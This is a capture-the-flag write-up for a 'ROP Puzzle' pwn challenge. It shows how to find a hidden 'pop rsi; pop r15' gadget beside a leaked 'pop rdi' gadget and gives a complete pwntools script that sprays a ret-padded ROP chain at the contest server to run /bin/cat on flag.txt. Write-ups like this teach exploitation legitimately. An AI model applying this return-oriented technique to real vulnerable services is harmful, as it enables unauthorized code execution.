Tags: pwn rop
Rating:
### Challenge ###
The challenge presents you with pieces to build a ROP chain, but is missing the stack offset and gadget to pop RSI.
```
Welcome to the ROP Puzzle!
Your goal is simple: you have to call the magic function as magic("/bin/cat", "flag.txt").
Here are the pieces:
Magic function: 0x560cb5cca240
flag.txt string : 0x560cb5ccb008
/bin/cat string : 0x560cb5ccb01c
pop rdi; ret gadget in __libc_csu_init : 0x560cb5cca3d3
It appears we're missing a piece. Can you ROP without it? Go ahead:
```
### Solution ###
We know that `pop rsi, r15; ret;` is two bytes behind `pop rdi; ret;` in `__libc_csu_init.` Using this we can set RSI. Since we don't know the stack offset, we can just add 20 `ret;` to the front of our rop chain and then spray the entire rop chain across the stack.
```python
from pwn import *
p = remote('challs.xmas.htsp.ro', 2006)
p.recvuntil(b"Magic function: ")
magic_func = int(p.recvline().strip(b'\n'),16)
p.recvuntil(b"flag.txt string : ")
flag_txt = int(p.recvline().strip(b'\n'),16)
p.recvuntil(b"/bin/cat string : ")
bin_cat = int(p.recvline().strip(b'\n'),16)
p.recvuntil(b"pop rdi; ret gadget in __libc_csu_init : ")
pop_rdi = int(p.recvline().strip(b'\n'),16)
pop_rsi = pop_rdi - 0x2 # pop rsi; pop r15
ret = pop_rdi +0x1 # ret
p.recvuntil(b"It appears we're missing a piece. Can you ROP without it? Go ahead:")
chain = p64(ret)*20
chain += p64(pop_rdi)
chain += p64(bin_cat)
chain += p64(pop_rsi)
chain += p64(flag_txt)
chain += p64(flag_txt)
chain += p64(magic_func)
p.sendline(chain*150)
p.interactive()
```
